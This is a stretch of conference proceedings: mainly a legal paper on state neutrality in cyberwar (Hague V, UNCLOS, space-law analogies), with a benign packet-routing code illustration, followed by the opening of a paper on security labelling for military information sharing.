Whitehead, Tim. Every email and web site to be stored. Telegraph.co.uk. http://www.telegraph.co.uk/technology/news/8075563/Every-email-and-website-to-be-stored.html. 20 Oct 2010.
Wikipedia. (2010, July 14). Anonymous remailer. Retrieved October 12, 2010, from Wikipedia: http://en.wikipedia.org/wiki/Anonymous_remailer.
WordNet. The state of being anonymous; nameless. http://wordnetweb.princeton.edu/perl/webwn?s=anonymity. Oct 2010.



Neutrality in the Context of Cyberwar

Julie Ryan 1 and Daniel Ryan 2
1 The George Washington University, Washington, USA
2 National Defense University, Washington, USA
jjchryan@gwu.edu
ryand@ndu.edu

Abstract: This paper will examine the legal antecedents of the concepts of neutrality and the current enforceability of declarations of neutrality in the context of information operations amongst belligerents. This is a non-trivial point of understanding, given the potential for belligerents to use and abuse infrastructure elements owned and/or operated by nation states desiring to remain neutral. The analysis will consider the instantiated concepts of neutrality, the potential for expanding or contracting the concepts of neutrality in the context of cyberwar, and the possibility of erosion of neutrality in cyberwar scenarios. We have a notion enshrined in international law that says that you don't lose your neutrality if belligerents use your telephone lines or telegraph lines to communicate, even if they are crossing your territory, even if they are passing operational orders. The problem with cyberwar is that they are potentially not just transferring orders but also potentially weapons -- cyber-weapons. So it becomes a more complex problem, and the challenge is to understand at what point the nation state should be required to act, or if such a point exists at all. This analysis will examine the intersection between technology and law in regards to this issue.

Keywords: neutrality; law of armed conflict; international humanitarian law; cyberwar

1. War and the laws of armed conflict<br />

For less than one percent of the last two million or so years of human evolution have agriculture and<br />

animal husbandry replaced the hunter-gatherer existence as a characteristic way of life. (Gat 2006, p.<br />

4) During the hunter-gatherer phase, humans engaged in endemic primitive warfare. (Keegan 1993,<br />

p. 5 and pp. 115ff) As technology evolved, it influenced – and was influenced by – warfare, producing<br />

revolutions in military affairs. (Boot 2006, p. 8) The longbow, stirrups, gunpowder, conoidal bullets,<br />

machine guns, aircraft, radar, sonar, rockets and spacecraft, and now computers and precision-guided<br />

weapons, are but a small sample of the technologies that have continuously changed the face<br />

of warfare throughout history. As warfare became the province of nation-states, belligerencies<br />

between and among nations led to some states declaring their intent to remain neutral, and the<br />

development of conditions under which their neutrality was recognized by the belligerents and other<br />

conditions under which neutrality was lost. This paper addresses modern concepts of neutrality, and<br />

explores the potential for, and perhaps need to, change our concepts of neutrality in the context of<br />

cyberwar as information technologies change warfare as it was previously practiced.<br />

War is “a condition of armed hostility between States,” (Hyde 1945, p. 1686. Cited in Elsea &<br />

Grimmett 2007, p. 23) or “a contention, through the use of armed force, between states, undertaken<br />

for the purpose of overpowering another.” (von Glahn 1992. p. 669. Cited in Elsea & Grimmett 2007,<br />

p. 23) War is “an armed conflict, or a state of belligerence, between two factions, states, nations,<br />

coalitions or combinations thereof. Hostilities between the opponents may be initiated with or without<br />

a formal declaration by any of the parties that a state of war exists.” (Dupuy, p. 261) Marcus Tullius<br />

Cicero (106-43 BCE) famously said in an oration, Pro Tito Annio Milone ad iudicem oratio (Pro<br />

Milone), in defense of Titus Annius Milo, who had been accused of murdering Publius Clodius<br />

Pulcher, a political enemy, “Silent enim leges inter arma” (the law is silent in times of war), (Clark<br />

1907) but his assertion wasn’t true in antiquity, and isn’t true today.<br />

Except in limited conditions, war was made illegal by the Charter of the United Nations, which is a<br />

treaty among the world’s nations signed in the aftermath of World War II, a terrible conflict in which<br />

some fifty million (perhaps as many as eighty million) died worldwide. (White 2005) Article 2(4) of the<br />

Charter provides that, “All Members shall refrain in their international relations from the threat or use<br />

of force against the territorial integrity or political independence of any state, or in any other manner<br />

inconsistent with the Purposes of the United Nations.” However, Article 51 makes the use of military force<br />

permissible in self-defense, and Article 42 makes military force permissible if authorized by the<br />

Security Council.<br />

When military force is used, its use is subject to other treaties that limit the nature and extent of force<br />

that may be employed in achieving military objectives. Philosophers, statesmen and military<br />

commanders have struggled to balance the destructive forces of armed combat with national and<br />

international humanitarian concerns, (Kolb 1997, n. 3) leading to the twin concepts of jus ad bellum —<br />

“the conditions under which belligerents might justly resort to the use of armed force as a means of<br />

conflict resolution” (Hensel 2008, p. 5) — and jus in bello —“the conditions for the just employment of<br />

armed force at the strategic, operational and tactical levels during periods of armed hostilities” (Hensel<br />

2008, p. 5) — that together comprise the notions of just war. The notion of jus in bello (“justice in war”)<br />

was known to Sun Tzu in 4th-century BCE China. (Giles) Even so, the concept of jus in bello was<br />

slower to develop than jus ad bellum. In addition to the United Nations Charter, limitations on the<br />

use of military force include inter alia the Geneva Conventions and Protocols, and the Hague<br />

Conventions.<br />

2. Cyberwar<br />

As human beings have moved into cyberspace, they have begun to engage in all the usual types of<br />

human behavior, good and bad, allowed by the technology: communicating, working, contracting,<br />

playing, and socializing, as well as stealing, breaching contracts, engaging in tortious behavior, and<br />

invading other users’ privacy. Now, nation-states are looking at cyberspace as a place to conduct<br />

warfare operations, and terrorists are examining the possibilities inherent in asymmetric attacks<br />

through cyberspace on critical infrastructures.<br />

The “nature” of cyberspace, however, differs in significant ways from the physical, electrical, chemical,<br />

and photonic properties of “real” space. Communications across the Internet take the form of packets<br />

containing addressing and administrative data as well as the intended bits being exchanged. ("What is<br />

a packet?") The paths taken by packets exchanged across the Internet are under the control of<br />

algorithms within the switches that relay the packets. (Tyson 2001) The paths are neither known to<br />

nor controllable by the users of the network.<br />
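The hop-by-hop forwarding described above can be illustrated with a minimal sketch; the router names, topology, and forwarding tables below are invented for illustration and are not drawn from any real network:<br />

```python
# Illustrative sketch only: a packet bundles addressing and administrative
# data with its payload, and each relay independently chooses the next hop
# from its own forwarding table. The sender never dictates the path.

def make_packet(src, dst, payload, ttl=16):
    """A packet carries addressing/administrative fields plus the data."""
    return {"src": src, "dst": dst, "ttl": ttl, "payload": payload}

# Hypothetical topology: each router maps a destination to a next hop.
FORWARDING = {
    "A": {"D": "B"},   # A forwards traffic bound for D via B
    "B": {"D": "C"},   # B independently chooses C, not the sender
    "C": {"D": "D"},   # C delivers directly
}

def route(packet, start):
    """Relay the packet hop by hop until it reaches its destination."""
    path, node = [start], start
    while node != packet["dst"]:
        if packet["ttl"] == 0:
            raise RuntimeError("TTL expired")
        packet["ttl"] -= 1
        node = FORWARDING[node][packet["dst"]]  # local decision at each hop
        path.append(node)
    return path

print(route(make_packet("A", "D", b"orders"), "A"))  # ['A', 'B', 'C', 'D']
```

The path emerges entirely from the routers' local tables: change B's entry for D and the packets take a different route, with the sender none the wiser.<br />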

Traditional approaches developed in real space for responding to misbehavior are hampered in<br />

cyberspace by difficulties in attribution, and only a loose correlation exists between “location” in<br />

cyberspace and location of users and cyber equipment within traditional legal jurisdictions. These<br />

realities will certainly impact the development of weapons, strategies, doctrines and tactics for use in<br />

cyberwar and countering cyberterrorism. Nevertheless, nations will undoubtedly seek to exercise and<br />

enhance national power by means of information operations in cyberspace, and the laws of armed<br />

conflict that have served civilized nations well in real space must be examined to determine how they<br />

can be used, and if they must be changed, to meet the realities of cyberwar and cyberterrorism. This<br />

paper will specifically address the legal issues associated with nation-state neutrality as applicable to<br />

these new realities.<br />

3. Neutrality during periods of belligerency<br />

“Neutrality” refers to concepts in customary international law and treaty law concerning the nonparticipation<br />

of some nations in warfare when a state of belligerency exists among other nations. The<br />

laws of neutrality presuppose the coexistence of war and peace – belligerents and their allies at war<br />

with other belligerents and their allies, while diplomacy, commerce, communications and so forth<br />

continue with and among nations not involved in the belligerencies, both neutral states with other<br />

neutral nations and neutral states with the belligerents. (Neff 2000, p. 1. Cited by Kelsey 2008, p.<br />

1442) Neutrality is a “legal, temporary situation of one state in relation to a conflict between two or<br />

more states. Neutrality consists in not participating directly in the war, through not rendering<br />

assistance to any belligerent party.” (Osmanczyk & Mango 2004, A-F, p. 1547) It may be manifested<br />

by unilateral declaration or by entry into bilateral or multilateral treaties. Grotius identified two rules for<br />

neutrals: (1) neutrals should neither strengthen the position of a belligerent power with an unjust<br />

cause, nor hinder the position of a belligerent with a just cause, (Book III, Chapter XVII (III)(1)) and (2)<br />

warring parties should be treated alike when the cause of the war is in doubt. (Book III, Chapter XVII<br />

(III)(1))<br />

Even before the second half of the 19th century when the laws of war began to be<br />

codified in multilateral treaties, some principles relating to the conduct of armed hostilities<br />

had been included in bilateral treaties.... The rights and duties of neutrality in war,<br />

especially at sea, have been addressed in a large number of bilateral treaties between<br />

states from at least the early 17th century. [Footnote 12: W. E. Hall, The Rights and<br />

Duties of Neutrals, Longman's Green, London, 1874, pages 27-46, in a chapter<br />

surveying the growth of the law affecting belligerent and neutral states to the end of the<br />

18th century, refers to "innumerable treaties" relating to neutrality that were concluded<br />

over several centuries (page 28).] Sometimes, following the conclusion of a bilateral<br />

treaty on neutrality, additional states proceeded [sic] to it. [Footnote 13: For example, on<br />

February 27, 1801 Denmark ceded to the convention between Russia and Sweden for<br />

the Reestablishment of an Armed Neutrality, which had been signed on 16 December<br />

1800. 55 CTS (1799-1801) 411-24.] (Roberts & Guelff 1982, p. 4)<br />

The law of neutrality was eventually codified in the Hague Conventions of 1907, including No. 3,<br />

Convention Relative to the Opening of Hostilities (requiring notice to neutrals of a state of war); No.<br />

11, Convention Relative to Certain Restrictions with Regard to the Exercise of the Right of Capture in<br />

Naval War; and especially No. 5, Convention Respecting Rights and Duties of Neutral Powers and<br />

Persons in Case of War on Land. (The Avalon Project)<br />

Having assumed a position of neutrality, a nation must not allow transit of military forces or equipment<br />

by belligerents across its land territory or the airspace above its land territory. The rules with respect<br />

to belligerent naval vessels, and aircraft flying over a neutral’s territorial waters and exclusive<br />

economic zones, are more complicated. The notion of transit passage applies to “straits which are<br />

used for international navigation between one part of the high seas or an exclusive economic zone<br />

and another part of the high seas or an exclusive economic zone.” (UNCLOS 1982, Art. 37) Ships and<br />

aircraft operated by belligerent nations may transit the territorial waters of a neutral state “solely for<br />

the purpose of continuous and expeditious transit of the strait . . . .” (UNCLOS 1982, Art. 38) During<br />

transit passage, ships and aircraft must: “proceed without delay . . ., refrain from any threat or use of<br />

force against the sovereignty, territorial integrity or political independence of States bordering the<br />

strait . . ., and refrain from any activities other than those incident to their normal modes of continuous<br />

and expeditious transit unless rendered necessary by force majeure or by distress.” (UNCLOS 1982,<br />

Art. 39)<br />

The notion of innocent passage applies to passage through the territorial waters of a neutral state and<br />

is permitted “so long as it is not prejudicial to the peace, good order or security of the coastal State.”<br />

(UNCLOS 1982, Art. 19) Passage is not innocent if it involves “any threat or use of force against the<br />

sovereignty, territorial integrity or political independence of the coastal State . . ., any exercise or<br />

practice with weapons of any kind, . . . any act of propaganda aimed at affecting the defence or<br />

security of the coastal State, . . . the launching, landing or taking on board of any aircraft [or] military<br />

device, [or] any act aimed at interfering with any systems of communication or any other facilities or<br />

installations of the coastal State.”(UNCLOS 1982, Art. 19)<br />

Once a state decides on a position of neutrality, it must take steps to prevent its territory<br />

from becoming a base for military operations of a belligerent. It must prevent the<br />

recruiting of military personnel, the organizing of military expeditions, and the<br />

constructing, outfitting, commissioning, and arming of warships for belligerent use. A<br />

neutral state is under no obligation to prevent private persons or companies from<br />

advancing credits or selling commodities to belligerents. Such sales are not illegal under<br />

the international law of neutrality. A neutral state may, if it chooses, go beyond the<br />

requirements of international law by placing an embargo upon some or all sales or<br />

credits to belligerents by its nationals. If it does so, it has the obligation to see that<br />

legislation, commonly referred to as neutrality laws, is applied impartially to all<br />

belligerents. Once enacted, neutrality laws are not to be modified in ways that would<br />

advantage one party in the war. (Neutrality 2008)<br />

There is a limited communications exception in the law of neutrality for communications by<br />

belligerents and their allies across the land territory of neutral states. Hague Convention V, Article 8,<br />

provides, “A neutral Power is not called upon to forbid or restrict the use on behalf of the belligerents<br />

of telegraph or telephone cables or of wireless telegraphy apparatus belonging to it or to companies<br />

or private individuals.” The Internet did not exist when the Hague Conventions were written, of course,<br />

but arguably this exception applies to Internet communications as well as telegraph and telephone<br />

communications. The nature and scope of this exemption is a key issue for neutrality in the context of<br />

cyberspace.<br />

4. Neutrality in the context of cyberwar<br />

When Hague V(8) was written, communications across the territory of a neutral nation via telegraph or<br />

telephone cables, or by wireless telegraphy, might have involved passing a variety of types of<br />

information. Command and control information might have been passed, for example, or intelligence<br />

or targeting information. Assuming that military units knew their own locations (not necessarily a<br />

reasonable assumption in those days), unit locations may have been reported. In short, information<br />

useful in prosecuting the belligerency, if it could be reduced to textual or numeric form suitable for<br />

transmission across the communications systems in use at that time, could be transmitted without<br />

imposing a burden on the neutral state to recognize or interdict the transmission. Some information<br />

may have been encoded or enciphered, and transmission would have necessarily been slow by<br />

today’s standards, but fast relative to other media and transmission capabilities available at the time<br />

(foot, horseback, railroad, ship). (Lail 2002, p. 4)<br />

Fast forward to the twenty-first century, and the ability to pass useful information across the Internet is<br />

much enhanced. Now not just text and numbers may be communicated, but sound to at least the<br />

level of voice recognition, imagery including high-quality color pictures, and measurement and<br />

telemetry data, such as GPS data, can be communicated quickly and easily across the Internet.<br />

Perhaps more importantly, tools and even weapons themselves, perhaps in the form of malware, can<br />

be moved across the territory of neutrals and belligerents alike using the Internet. Those engaged in<br />

such Internet communications do not, and for the most part cannot, know the path the packets<br />

comprising their communications will take, much less can they control the path. In fact, some of the<br />

packets may take different paths from other packets that are part of the same transmission, all<br />

transparent to and beyond the control of those engaged in the communication.<br />

Historically, warfare has involved the use of kinetic weapons (e.g. projectiles) to kill and destroy.<br />

Modern warfare continues to use kinetic weapons, but may also use energy weapons – lasers, for<br />

example; but note that Protocol IV of the 1980 Convention on Certain Conventional Weapons<br />

specifically outlaws the use of blinding lasers – or may use logic weapons to attack and defend cyber-dependent<br />

infrastructures. In modern warfare, information operations may be used in connection<br />

with kinetic operations (as in the confrontation between Russia and Georgia in 2008), (Tikk 2010, p.<br />

66ff) or can be used without ancillary kinetic operations (as in the confrontation between Russia and<br />

Estonia in 2007). (Tikk 2010, p. 14ff) It is highly probable that we will never again see kinetic<br />

operations of any great extent without a cyber component. Whether information operations among<br />

nation-states without “armed conflict” will be deemed to be warfare probably depends upon the level<br />

of destruction realized. (Article 51 of the United Nations Charter uses the expression “armed attack” to<br />

justify war in self-defense by nation-states. However, the expression is not defined. It is not clear that<br />

it is proper, or desirable, to view a purely cyber incident as an armed attack. See Wingfield 2006, p.<br />

12. See also Sullivan 2010) Information operations among, between or with non-nation-states cannot,<br />

by definition, be war, regardless of the level of destruction attained or the use of uniformed military<br />

personnel by one side or another and despite the common misuse of the term in referring to conflicts<br />

that are not between or among nation-states, as in “the global war on terror” (Rumsfeld Memo 16<br />

October 2003) or the “war on drugs.” (Testimony of OMB Director Nussle)<br />

While belligerents’ use of networks that cross a neutral’s territory can take place without violating the<br />

neutrality status of the nations through whose territory the communications pass, Hague V(8) arguably<br />

did not foresee that that use might include weapons. The rules concerning neutrality require that<br />

passage of weapons or other military materials and equipment across the territory of a neutral must<br />

be interdicted by the neutral state, and if it fails to do so, or is unable to do so, the belligerents against<br />

whom the weapons or materials are to be used have a legal right to attack the transfer. (Brown 2006,<br />

p. 210) Hague V(1) forbids land transfers and Hague V(2) forbids use of the atmosphere. Some<br />

analysts have, therefore, concluded that cyberwar is not permitted under current neutrality law without<br />

a likely violation of the claimed neutrality. (Kelsey 2008, pp. 1441-6) They recommend changes to<br />

bring the law into conformance with the reality of Internet transfers. (Kelsey 2008, pp. 1448-9) One<br />

recommendation would focus on intent: the rules of neutrality would not be violated unless the<br />

belligerent intended to use the information infrastructure of the neutral to deliver the weapons. The<br />

neutral would not have to interdict an unintentional passage, and would not be subject to attack by the<br />

other side based on an unintentional crossing of its territory by the cyber weapons. (Kelsey 2008, pp.<br />

1448-9) This approach seems hopeless to us. The neutral probably has no knowledge that weapons<br />

are passing across its territory, could realistically do nothing if it did know, and has even less access<br />

to knowledge of the belligerent’s intent with respect to the crossing.<br />

However, there is an alternative approach to framing the problem and its solution. Extra-atmospheric<br />

movements of weapons (other than nuclear weapons) and military materials above the territory of<br />

neutrals are permitted without imposing a duty on the neutral to interdict. The United Nations adopted a<br />

“Declaration of Legal Principles Governing the Activities of States in the Exploration and Use of Outer<br />

Space” in 1963 (Wolter 2003, p. 4) The Declaration has since been supplemented by three<br />

resolutions laying down the legal principles applicable to the exploration and exploitation of outer<br />

space, a “Declaration on International Cooperation in the Exploration and Use of Outer Space for the<br />

Benefit and in the Interest of All States, Taking into Particular Account the Needs of Developing<br />

Countries,” and five treaties and agreements governing the use of space and space-related activities.<br />

(United Nations Treaties and Principles on Space Law ) These treaties, agreements and principles<br />

are collectively known as the “United Nations Treaties and Principles in Outer Space.” Nuclear<br />

weapons are forbidden, but other weapons (kinetic weapons, lasers) are permitted. (Although nuclear<br />

weapons are banned, it is recognized that some uses of nuclear power are needed in space; the<br />

Treaties and Principles provide for safety in its use, mitigation of risks, and liability for states that fail to<br />

control the nuclear power or its sources.)<br />

The very nature of outer space is such that spacecraft do not have the same ability to control their<br />

flight paths that aircraft operating within the atmosphere have, (Braeunig 1997-2008) and the cost of a<br />

space program that could interdict is large, (Fox 2007) so a rule requiring interdiction of belligerents’<br />

weapons in space by the neutral does not make sense. Spacecraft and satellites in orbit pass above<br />

both belligerents and neutrals and cannot avoid doing so, being subject to the laws of celestial<br />

mechanics. Accordingly, the notions of territorial control that apply in the laws of the sea and the<br />

regulation of aircraft, cannot apply in outer space. If neutrals were required to exercise control over<br />

the use of outer space in the same way they exercise control over air traffic in the skies above their<br />

territories, it would be practically impossible to maintain neutrality at all.<br />

Similarly, a neutral cannot interdict belligerent Internet use of its<br />

information infrastructure without prohibitive costs or unacceptable consequences for its own licit<br />

use of that infrastructure: "a state may not be able to prevent [cyber] attacks from leaving its<br />

jurisdiction unless it severs all connections with computer systems in other states." (Brown 2006, p.<br />

210) This indicates that the appropriate rule for Internet use is more like the rule for space than the<br />

rule for air or land traffic, even when the use involves cyber weapons or information useful to the<br />

belligerent for military purposes (telemetry, GPS, weather data, etc.). Such acceptable use would, of<br />

course, apply to all belligerents, because the rules of neutrality prohibit the neutral state favoring one<br />

side in any way over the other side. (Brown 2006, p. 211)<br />

5. Conclusion<br />

Phillip Jessup, in 1936, concluded, "There is nothing new about revising neutrality; it has undergone<br />

an almost constant process of revision in detail." (Jessup 1935-6, p. 156. Cited in Walker 2000, p.<br />

109) With the advent of cyberwar, rules governing neutrality during periods of belligerency need to be<br />

reconsidered and revised yet again. The realities of the Internet age mean that weapons as well as<br />

information can move across communications networks in ways that were not possible or foreseeable<br />

during the earlier evolution of the laws of war and neutrality. Yet the paths that those weapons will<br />

take as they traverse the Internet on the way to their intended targets are beyond the knowledge or<br />

control of the belligerents that launch them. Detection, identification and interdiction by neutrals<br />

across whose territories the weapons may pass are impractical without sacrificing the utility of the<br />

networks for licit use by the neutrals and others, and hence effectively impossible.<br />

However, it is only the details of the rules of neutrality that must change. Neutrals will not be<br />

required to do what they cannot do, and will not be subject to attack when they do not detect, identify<br />

and interdict the flow of weapons through their information infrastructures. The key principle of<br />

neutrality requiring that neutrals do not knowingly and willingly participate in the belligerency, or favor<br />

one side over the other, can and must be retained.<br />

Disclaimer: Opinions expressed in this paper are those of the authors and do not represent positions<br />

of George Washington University, or of the Information Resources Management College, the National<br />

Defense University, the Department of Defense, or the United States Government.<br />

References<br />

The Avalon Project: Documents in Law, History and Diplomacy. Yale Law School, Lillian Goldman Law Library.<br />

http://avalon.law.yale.edu/default.asp.<br />

Boot, Max (2006) War Made New: Technology, Warfare, and the Course of History, 1500 to Today. New York:<br />

Gotham Books.<br />

Braeunig, Robert A. (1997-2008) Orbital Mechanics. http://www.braeunig.us/space/orbmech.htm.<br />

Brown, Davis, A Proposal for an International Convention To Regulate the Use of Information Systems in Armed<br />

Conflict, 47 Harv. Int'l L.J. 179 (2006).<br />

Clark, A. C. (1907) Q. Asconii Pediani Orationum Ciceronis Quinque Enarratio.<br />

http://www.attalus.org/latin/asconius2.html#Milo.<br />

Dupuy, Trevor N. et al. eds. (2003) Dictionary of Military Terms, 2nd Ed. New York: H.W. Wilson.<br />

Elsea, Jennifer K. & Grimmett, Richard F. (2007) Declarations of War and Authorizations for the Use of Military<br />

Force: Historical Background and Legal Implications. Washington, DC: Congressional Research Service<br />

RL31133. http://www.fas.org/sgp/crs/natsec/RL31133.pdf.<br />

Fox, Bernard et al. (2007) Guidelines and Metrics for Assessing Space System Cost Estimates. Santa Monica,<br />

CA: Rand Corporation. http://www.rand.org/pubs/technical_reports/2008/RAND_TR418.pdf.<br />

The Gale Group, Inc. (2008) West's Encyclopedia of American Law, Edition 2. Farmington Hills, MI: Thomson<br />

Gale. http://legal-dictionary.thefreedictionary.com/neutrality.<br />

Gat, Azar (2006) War in Human Civilization. Oxford: Oxford University Press.<br />

Giles, Lionel (1910) Sun Tzu on the Art of War. http://www.chinapage.com/sunzi-e.html.<br />

Grotius, Hugo (1925) De Jure Belli ac Pacis [Of the Law of War and Peace]<br />

Libri Tres. Oxford: Clarendon Press. [Reproduced as a Special Edition (1984) Birmingham, AL: Legal Classics<br />

Library.] In particular, see Chapter XVII: On Those Who Are of Neither Side in War.<br />

Hall, W. E. (1874) The Rights and Duties of Neutrals, Longman's Green, London.<br />

Hague Convention (V) respecting the Rights and Duties of Neutral Powers and Persons in Case of War on Land.<br />

The Hague, 18 October 1907. http://www.icrc.org/ihl.nsf/FULL/200?OpenDocument.<br />

Hensel, Howard M. (2008) Legitimate Use of Military Force. Surrey, UK:Ashgate Publishing Group.<br />

Hyde, Charles C. (1945) International Law Chiefly as Interpreted and Applied by the<br />

United States, Vol. 3. New York: Hachette Book Group USA (Little Brown & Co.).<br />

International Humanitarian Law - Treaties & Documents by Date. International Committee of the Red Cross.<br />

http://www.icrc.org/ihl.nsf/INTRO?OpenView.<br />

Jessup, Phillip and Deák, Francis (1935-6) Neutrality, Its History, Economics and Law: Vol. IV Today and<br />

Tomorrow. New York: Columbia University Press.<br />

Johnson, Phillip A., et al. (May, 1999) An Assessment of International Legal Issues in Information Operations.<br />

Washington, DC: Department of Defense Office of General Counsel.<br />

Kastenberg, Joshua E. (2009) “Non-Intervention and Neutrality in Cyberspace: An Emerging Principle in the<br />

National Practice of International Law.” 64 A.F. L. Rev. 43.<br />

Keegan, John (1993) A History of Warfare. New York: Alfred A. Knopf.<br />

Kelsey, Jeffrey T. G. (2008) “Hacking into International Humanitarian Law: The Principles of Distinction and<br />

Neutrality in the Age of Cyber Warfare.” 106 Mich. L. Rev. 1427.<br />

Lauterpacht, Hersch, Oppenheim's International Law (7th Ed., 1948) London: Longmans, Green & Co.<br />

Kolb, Robert (1997) “Origin of the twin terms jus ad bellum/jus in bello,” International Review of the Red<br />

Cross, No. 320, p.553-562. Online at<br />

http://www.icrc.org/web/eng/siteeng0.nsf/iwplist163/d9dad4ee8533daefc1256b66005affef.<br />

Lail, Benjamin (2002) Broadband Network and Device Security. Sydney: McGraw-Hill. http://books.mcgrawhill.com/downloads/products/0072194243/0072194243_ch01.pdf.<br />

Neff, Stephen C. (2000) The Rights and Duties of Neutrals. Manchester, UK: Manchester University Press.<br />

Neutrality. (2008) West's Encyclopedia of American Law, Edition 2. http://legaldictionary.thefreedictionary.com/neutrality.<br />

Osmanczyk, Edmund Jan & Mango, Anthony (2004) Encyclopedia of the United Nations and International<br />

Agreements. Florence, Kentucky: Routledge.<br />

Roberts, Adam and Guelff, Richard (1982) Documents on the Laws of War, 3d Ed. Oxford: Oxford University<br />

Press.<br />

“Rumsfeld Memo 16 October 2003” (2008) SourceWatch.<br />

http://www.sourcewatch.org/index.php?title=Rumsfeld_Memo_16_October_2003<br />

Sullivan, Bob (2010) “Could Cyber Skirmish Lead U. S. to War?” http://redtape.msnbc.com/2010/06/imagine-thisscenario-estonia-a-nato-member-is-cut-off-from-the-internet-by-cyber-attackers-who-besiege-the-countrysbandw.html<br />

“Testimony of OMB Director Nussle” (2008) The White House.<br />

http://www.whitehouse.gov/omb/legislative_testimony_director_nussle_021308<br />

Tikk, Eneken et al. (2010) International Cyber Incidents: Legal Considerations. Tallinn: Cooperative Cyber<br />

Defence Centre of Excellence.<br />

Tyson, Jeff. (April 3, 2001) "How Internet Infrastructure Works" HowStuffWorks.com.<br />

http://computer.howstuffworks.com/internet/basics/internet-infrastructure.htm<br />

United Nations Convention on the Law of the Sea (UNCLOS), (1982)<br />

http://www.un.org/Depts/los/convention_agreements/convention_overview_convention.htm.<br />

United Nations Convention on Prohibitions or Restrictions on the Use of Certain Conventional Weapons Which<br />

May Be Deemed to Be Excessively Injurious or to Have Indiscriminate Effects, Protocol IV (1980).<br />

http://www.un.org/millennium/law/xxvi-18-19.htm.<br />

United Nations Treaties and Principles on Space Law (2010)<br />

http://www.unoosa.org/oosa/en/SpaceLaw/treaties.html<br />

von Glahn, Gerhard (1992) Law Among Nations: An Introduction to Public International Law (6th ed.) New York:<br />

Macmillan.<br />

Walker, George K. (November, 2000) “Information Warfare and Neutrality.” 33 Vand. J. Transnat'l L. 1079.<br />

"What is a packet?" (December 1, 2000) HowStuffWorks.com.<br />

http://computer.howstuffworks.com/question525.htm<br />

White, Matthew (2005) Source List and Detailed Death Tolls for the Twentieth Century Hemoclysm.<br />

http://users.erols.com/mwhite28/warstat1.htm.<br />

Wingfield, Thomas C. (2006) “When is a Cyberattack an ‘Armed Attack?’ Legal Thresholds for Distinguishing<br />

Military Activities in Cyberspace.” Cyber Conflict Studies Association.<br />

http://www.docstoc.com/docs/445063/when-is-a-cyberconflict-an-armed-conflict<br />

Wolter, Detlev (2003) Common Security in Outer Space and International Law: A <strong>European</strong> Perspective.<br />

(Geneva: United Nations, UNIDIR/2005/29, 2006)<br />

227


Labelling: Security in Information Management and Sharing

Harm Schotanus, Tim Hartog, Hiddo Hut and Daniel Boonstra<br />

TNO Information and Communication Technology, Delft, The Netherlands<br />

Harm.schotanus@tno.nl<br />

Tim.hartog@tno.nl<br />

Hiddo.hut@tno.nl<br />

Daniel.boonstra@tno.nl<br />

Abstract: Military communication infrastructures are often deployed as stand-alone information systems<br />

operating in System High mode. Network-Enabled Capabilities (NEC) and combined military operations lead

to new requirements for information management and sharing which current communication architectures cannot<br />

deliver. This paper informs information architects and security specialists about an incremental approach<br />

introducing labelling of documents by users to facilitate information management and sharing in security-related military scenarios.

Keywords: labelling, meta-information, information security, cross-domain solutions, information sharing, need-to-protect, duty-to-share

1. Introduction<br />

This paper presents an overview of the steps to develop a meta-information capability. First, it<br />

presents a broad overview of what meta-information and labelling are and how they can be applied. Then it focuses on one specific security application of labelling, secure information exchange, i.e.

selective and regulated information sharing, based on meta-information. We also present a possible<br />

roadmap for implementing a secure information sharing capability based on meta-information. The<br />

purpose of this roadmap is to analyse what ‘ingredients’ are required for implementing such a<br />

capability, i.e. the problems we have identified and the technology that is necessary to solve these<br />

problems.<br />

The importance of sharing information in networked military operations, especially coalition networks,<br />

is commonly recognised. An important driver for future communication architectures is (NATO)<br />

Network-Enabled Capabilities (NNEC)(Buckman 2005). The integrated and coordinated deployment<br />

of all capabilities within a coalition is the central goal, relying heavily upon regulated information sharing (Schotanus 2009)(Martis 2006). A better integrated communication architecture contributes to the sharing of relevant military information by making it easier and quicker. But how does confidentiality fit

into this picture? What if a coalition partner does not want to share specific information because<br />

sharing poses a bigger risk for them or for the mission than not sharing or vice versa? Which methods<br />

are available to differentiate between information to-be-shared and information not-to-be-shared? The<br />

primary objective is that the owner of the information remains in control of that information.<br />

Relevant information produced during military coalition operations usually does not originate from a<br />

single partner but is the result of multiple partners working together using some form of online or<br />

offline shared information mechanism like documents distributed via e-mail or digital photos shared<br />

via situational awareness applications. Information is nowadays typically divided amongst the coalition<br />

partners, each creating a separate information domain in which the information is stored and<br />

processed. Such an information domain is usually a standalone network. Transferring information from one domain to another is often handled by out-of-band means, which may cause more problems than it solves, as there is little control over the information exchange. Connecting these different domains is a step that is currently being taken, but it also leads to many problems, not least because of the different responsibilities for each of these domains. Information sharing without compromising the

confidentiality is a problem that has to be solved by choosing an information management strategy<br />

that is based on the ability to regulate the sharing of information and that cannot be addressed by<br />

infrastructural solutions. In essence, this is caused by the inability of the infrastructure to determine<br />

the value of the information and hence it cannot enforce decisions about whether information can or<br />

cannot be shared with the intended partner.<br />



Harm Schotanus et al.<br />

In the remainder of this paper we will often use the term information domain. This is defined as a<br />

collection of information under one responsibility (e.g. a nation or organisation) that operates for a

single purpose (e.g. a mission) and has a single security policy.<br />

2. Meta-information and labelling<br />

A new information management strategy could be based on mechanisms that make decisions based<br />

on meta-information instead of on the information itself. By adding relevant meta-information, the user<br />

can effectively control under what conditions information can be released.

Meta-data or meta-information is information about information. For example, a military security<br />

marking (such as NATO SECRET) on the top and bottom of each page of a document is a form of<br />

meta-information because it conveys the classification of the document, in other words it is (security<br />

specific) meta-information about other information. To enable regulated sharing of information<br />

between different information domains or with partners in a coalition, meta-information can be used to<br />

describe certain properties of information objects. These properties can be used to enforce decisions<br />

in a release mechanism whether information should or should not be shared. The meta-information is<br />

often called a label, and the process of creating a label is called labelling. This reflects two important<br />

concepts:<br />

- Sharing information between coalition partners presumes a way of deciding whether a specific information object may or may not be shared.
- For each information object a set of properties can be determined that can form the basis of a decision process for sharing information.

The crucial concept in our labelling approach is that we separate the logic to enforce decisions from<br />

the intelligence to determine the properties of the information. This means we can reduce the<br />

complexity of the decision-making process.

2.1 Examples of meta-information<br />

Using properties of the information in addition to the original information creates new possibilities. If information objects such as files carry meta-information, for example the type-of-file (presentation, document or image), file extension (ppt, doc, pdf, jpg), author, security marking or time-of-creation, then these meta-information properties can be used for making decisions in several scenarios [see Figure 1].

Figure 1: Examples of information with their meta-information<br />

Because our aim is to both facilitate regulated sharing mechanisms and to present the power and<br />

flexibility of meta-information, we grouped these new possibilities into two categories: use cases

within a single information domain and use cases in federated information domains.<br />

Many software applications already store meta-information within information objects. Image files for<br />

example carry resolution information while photos carry the camera manufacturer and model that was<br />

